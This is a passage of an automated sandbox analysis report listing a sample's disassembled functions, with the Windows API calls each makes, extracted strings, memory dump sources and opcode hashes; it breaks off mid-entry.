                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                  • String ID: DllGetClassObject
                                                                  • API String ID: 753597075-1075368562
                                                                  • Opcode ID: 0a40c7895f6063a323517bbfa76d1e0f0934536151e5cf3f0ec5162b59098fa2
                                                                  • Instruction ID: c950233cd0564253724e1613412ab10753ed3b98ee79615ec36ffcb6f517811c
                                                                  • Opcode Fuzzy Hash: 0a40c7895f6063a323517bbfa76d1e0f0934536151e5cf3f0ec5162b59098fa2
                                                                  • Instruction Fuzzy Hash: CA4191B5602204EFDB15DF64C884F9ABBA9EF85314F1681A9EC099F205D7B1DE44CBA0
                                                                  Function 00952753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 009527C0
                                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009527DC
                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00952822
                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009B5890,00000000), ref: 0095286B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1173514356-4108050209
                                                                  • Opcode ID: 98e89b442b962c73a714146740271cec1dcdcce7804d7e33ff2f5005bba832df
                                                                  • Instruction ID: 97478ec02d27464dfda47446f19bb2d1aa5eb2729ebb615bee9762e65b9017d8
                                                                  • Opcode Fuzzy Hash: 98e89b442b962c73a714146740271cec1dcdcce7804d7e33ff2f5005bba832df
                                                                  • Instruction Fuzzy Hash: AE41B0712083419FD720DF66D884F2ABBE8EF86315F04492DFAA5972D1D730E809CB62
                                                                  Function 0096D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0096D7C5
                                                                    • Part of subcall function 008F784B: _memmove.LIBCMT ref: 008F7899
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharLower_memmove
                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                  • API String ID: 3425801089-567219261
                                                                  • Opcode ID: e882b0ec511139fd5307ce9e4628488202c53e476662aaee6953e748600ed064
                                                                  • Instruction ID: 4522b9c99339495ff74580e8ea0e757351e041408ef415b71996d3e0f37d2ab6
                                                                  • Opcode Fuzzy Hash: e882b0ec511139fd5307ce9e4628488202c53e476662aaee6953e748600ed064
                                                                  • Instruction Fuzzy Hash: 3631C171A04609ABCF00EF68CD559FEB7B4FF55320B108A29E835976D1DB71AD05CB80
                                                                  Function 00948E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 0094AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0094AABC
                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00948F14
                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00948F27
                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00948F57
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$_memmove$ClassName
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 365058703-1403004172
                                                                  • Opcode ID: 419a6cc39927ced748895f1d8d4002ca25e8c4d9459ab654aa27ad551b132465
                                                                  • Instruction ID: 880cdb98c96ff1b7eece153cb569a8564656dd04d83281722649a88edb973e7d
                                                                  • Opcode Fuzzy Hash: 419a6cc39927ced748895f1d8d4002ca25e8c4d9459ab654aa27ad551b132465
                                                                  • Instruction Fuzzy Hash: 7A213571A04108BEEB14ABB4DC8ADFFB76DEF46324F104929F525A71E0DF39484AD650
                                                                  Function 0096182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0096184C
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00961872
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009618A2
                                                                  • InternetCloseHandle.WININET(00000000), ref: 009618E9
                                                                    • Part of subcall function 00962483: GetLastError.KERNEL32(?,?,00961817,00000000,00000000,00000001), ref: 00962498
                                                                    • Part of subcall function 00962483: SetEvent.KERNEL32(?,?,00961817,00000000,00000000,00000001), ref: 009624AD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                  • String ID:
                                                                  • API String ID: 3113390036-3916222277
                                                                  • Opcode ID: 9fa78190eedc16f125091d8d50d369e39e0480eebc75236f3701115e5c5fd6e9
                                                                  • Instruction ID: 5b3f1c1399d9193c7e3db72a4bb07c1e11869ec234b91e48b9e00ad49b10552a
                                                                  • Opcode Fuzzy Hash: 9fa78190eedc16f125091d8d50d369e39e0480eebc75236f3701115e5c5fd6e9
                                                                  • Instruction Fuzzy Hash: AA218EB2504208BFEB119B64DC85FBB77EDEB88745F14412AF809A7240EA249D45ABA1
                                                                  Function 009763E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008F1D73
                                                                    • Part of subcall function 008F1D35: GetStockObject.GDI32(00000011), ref: 008F1D87
                                                                    • Part of subcall function 008F1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008F1D91
                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00976461
                                                                  • LoadLibraryW.KERNEL32(?), ref: 00976468
                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0097647D
                                                                  • DestroyWindow.USER32(?), ref: 00976485
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                  • String ID: SysAnimate32
                                                                  • API String ID: 4146253029-1011021900
                                                                  • Opcode ID: 747c021b44ad3dec8fdfc25c9d3b5ee6dfd7768ea5d1cab74befc36762d0299d
                                                                  • Instruction ID: fc0f83968f984c9023599d5882a1f52706519778b9ec6cd2c4c1787512ed8b3b
                                                                  • Opcode Fuzzy Hash: 747c021b44ad3dec8fdfc25c9d3b5ee6dfd7768ea5d1cab74befc36762d0299d
                                                                  • Instruction Fuzzy Hash: 8C21AE72210A09BFEF104F64DC90EBB37ADEF59368F108629FA18930A0D731DC81A760
                                                                  Function 00956D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00956DBC
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00956DEF
                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00956E01
                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00956E3B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  • Opcode ID: f0754275ef3228c21bc330ae6017d72260fba18a949124b66c22247127fd3de8
                                                                  • Instruction ID: 7b16b02b8beb48df06ceaa659bdd4df8ce3278839bfd4003a766cdb957ab1fff
                                                                  • Opcode Fuzzy Hash: f0754275ef3228c21bc330ae6017d72260fba18a949124b66c22247127fd3de8
                                                                  • Instruction Fuzzy Hash: 06219275600209ABDB20DF2ADC05B9A7BF8EF84722F604A29FDA0D72D0D7709958DB50
                                                                  Function 00956E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00956E89
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00956EBB
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00956ECC
                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00956F06
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  • Opcode ID: 40e3f2a79f090fc7adcad94816ed645a7443ca34d8c77d053dbda33e63029e2e
                                                                  • Instruction ID: 4f949b7ce459a535819b92168138ef3cefff8f1e6399507eca7ebd4606275a83
                                                                  • Opcode Fuzzy Hash: 40e3f2a79f090fc7adcad94816ed645a7443ca34d8c77d053dbda33e63029e2e
                                                                  • Instruction Fuzzy Hash: 5A21C4755013059BDB20DF6ADC05AAA77A8EF45721F600A19FDE0E32D0D7709868C750
                                                                  Function 0095AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0095AC54
                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0095ACA8
                                                                  • __swprintf.LIBCMT ref: 0095ACC1
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,0097F910), ref: 0095ACFF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                  • String ID: %lu
                                                                  • API String ID: 3164766367-685833217
                                                                  • Opcode ID: b4ea55d85c02215b30705b81b88f91e73f104f81a6c1db58c779df5853b47655
                                                                  • Instruction ID: 4eeaa6e52fffa03f866458fc6d81765b58c30ffab9a81d4a762a2872d2a12367
                                                                  • Opcode Fuzzy Hash: b4ea55d85c02215b30705b81b88f91e73f104f81a6c1db58c779df5853b47655
                                                                  • Instruction Fuzzy Hash: 47217F31A0010DAFCB10DF69D945EAE7BB8FF89314B0040A9F909EB252DB31EA45DB61
                                                                  Function 00951AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 00951B19
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                  • API String ID: 3964851224-769500911
                                                                  • Opcode ID: 883fa64cf448764feabee0d9372d2a362f3309a4e41520e16d879616a9a5ff60
                                                                  • Instruction ID: 518267c66d68a28b1c2b2255de9244a2abe2018aa223fc2b20f960cc6db897c6
                                                                  • Opcode Fuzzy Hash: 883fa64cf448764feabee0d9372d2a362f3309a4e41520e16d879616a9a5ff60
                                                                  • Instruction Fuzzy Hash: F9115E31A102088FCF00EFA4E955AFEB7B4FF66304B1084A5EC14A7695EB329D4ACB50
                                                                  Function 0096EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0096EC07
                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0096EC37
                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0096ED6A
                                                                  • CloseHandle.KERNEL32(?), ref: 0096EDEB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                  • String ID:
                                                                  • API String ID: 2364364464-0
                                                                  • Opcode ID: 4d540990521f9b2e9f1d30d44edcecd30b5a258569a8558aab2a18ccd0adfc5c
                                                                  • Instruction ID: c61ce20c484c4df94ed3ad1c2d6dcb7d6a9cea9f2dd4a7f4ca01f9aa7df29f42
                                                                  • Opcode Fuzzy Hash: 4d540990521f9b2e9f1d30d44edcecd30b5a258569a8558aab2a18ccd0adfc5c
                                                                  • Instruction Fuzzy Hash: CA814D756047009FDB60EF29C896F2AB7E5EF44750F14882DFA99DB2D2DB70AC408B52
                                                                  Function 0091541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                  • String ID:
                                                                  • API String ID: 1559183368-0
                                                                  • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                  • Instruction ID: e853409cb2d589e416a5b6983b707bbd45ac823cf604ce152cae979b68f72259
                                                                  • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                  • Instruction Fuzzy Hash: 86517170B00B0DDBDB249E69D8806EE77ABAFC1321F278729F825962D1D7749DD09B40
                                                                  Function 00970037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 00970E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096FDAD,?,?), ref: 00970E31
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009700FD
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0097013C
                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00970183
                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 009701AF
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 009701BC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                  • String ID:
                                                                  • API String ID: 3440857362-0
                                                                  • Opcode ID: 7c37b20566e135324378f6fa406238eb3fe83a894947531545620b995ad972af
                                                                  • Instruction ID: 003f9a8b232eb477db53b533422df17d5d6f0f5efd9fad160a43436bf028b912
                                                                  • Opcode Fuzzy Hash: 7c37b20566e135324378f6fa406238eb3fe83a894947531545620b995ad972af
                                                                  • Instruction Fuzzy Hash: F9512972218204AFD714EF68C891F6AB7E9FF84314F40892DF599972A2DB31E944CB52
                                                                  Function 0096D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0096D927
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0096D9AA
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0096D9C6
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0096DA07
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0096DA21
                                                                    • Part of subcall function 008F5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00957896,?,?,00000000), ref: 008F5A2C
                                                                    • Part of subcall function 008F5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00957896,?,?,00000000,?,?), ref: 008F5A50
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 327935632-0
                                                                  • Opcode ID: 42c837b7a523228dbf8dc1d28ae14206bb7cba408e69d005744353d49c6cdd4a
                                                                  • Instruction ID: e7a7a589334a1cbbd5a6f67a41fb668e3d53df1e7b77f6cb4e26d013a3ef4734
                                                                  • Opcode Fuzzy Hash: 42c837b7a523228dbf8dc1d28ae14206bb7cba408e69d005744353d49c6cdd4a
                                                                  • Instruction Fuzzy Hash: CA512735A05609DFCB00EFA8C4849ADB7F8FF09324B158065EA69AB322D731ED45CF91
                                                                  Function 0095E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0095E61F
                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0095E648
                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0095E687
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0095E6AC
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0095E6B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1389676194-0
                                                                  • Opcode ID: 679874b89a3b5914d61ea43ebfae8ec5d47cdb32d7f8e16578af36cea557e3c9
                                                                  • Instruction ID: 4d742d84b2826a3fd35e50160b9eecce46082d89317ad68d2a2974686da95d39
